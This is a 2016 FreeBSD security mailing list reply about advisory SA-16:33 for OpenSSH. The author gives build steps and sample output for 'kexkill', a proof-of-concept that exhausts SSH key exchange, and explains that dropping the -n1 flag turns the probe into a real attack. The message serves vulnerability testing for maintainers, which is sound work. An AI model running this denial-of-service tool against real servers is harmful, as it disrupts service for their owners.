From owner-freebsd-security@freebsd.org Sun Nov 6 14:59:46 2016 Return-Path: Delivered-To: freebsd-security@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8CD0AC3390B for ; Sun, 6 Nov 2016 14:59:46 +0000 (UTC) (envelope-from des@des.no) Received: from smtp.des.no (smtp.des.no [194.63.250.102]) by mx1.freebsd.org (Postfix) with ESMTP id 50CA5AC8 for ; Sun, 6 Nov 2016 14:59:45 +0000 (UTC) (envelope-from des@des.no) Received: from desk.des.no (smtp.des.no [194.63.250.102]) by smtp.des.no (Postfix) with ESMTP id 51925A8BC; Sun, 6 Nov 2016 14:59:39 +0000 (UTC) Received: by desk.des.no (Postfix, from userid 1001) id C741143EF0; Sun, 6 Nov 2016 15:59:38 +0100 (CET) From: =?utf-8?Q?Dag-Erling_Sm=C3=B8rgrav?= To: Xin LI Cc: Vladimir Terziev , "\" , Gregory Orange Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh References: <20161102075533.8BBA114B5@freefall.freebsd.org> <201611021357.uA2DvHMW003088@higson.cam.lispworks.com> <24ff198d-9bd2-9842-50d8-8a1d5e2ecf8a@FreeBSD.org> <79b7122f-3b1a-377f-42bf-bd2851c5e6ae@calorieking.com> <97DEB29F-E625-4A74-9E1A-BC2A220DCF5A@bwinparty.com> Date: Sun, 06 Nov 2016 15:59:38 +0100 In-Reply-To: (Xin LI's message of "Fri, 4 Nov 2016 10:08:05 -0700") Message-ID: <86vaw0irhh.fsf@desk.des.no> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/25.1 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 06 Nov 2016 14:59:46 -0000 Xin LI writes: > We will investigate if the statement is true and will issue patches > for earlier FreeBSD releases, if they are confirmed to be affected. Hoping to make your life a little easier: $ git clone https://github.com/dag-erling/kexkill $ cd kexkill $ ./autogen.sh && ./configure && make vulnerable 12.0 system: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit [no more output] ^C same system after applying SA-16:33: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] write(): Broken pipe kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer [...] ^C Remove -n1 to actually (attempt to) attack the system rather than just probe it. DES --=20 Dag-Erling Sm=C3=B8rgrav - des@des.no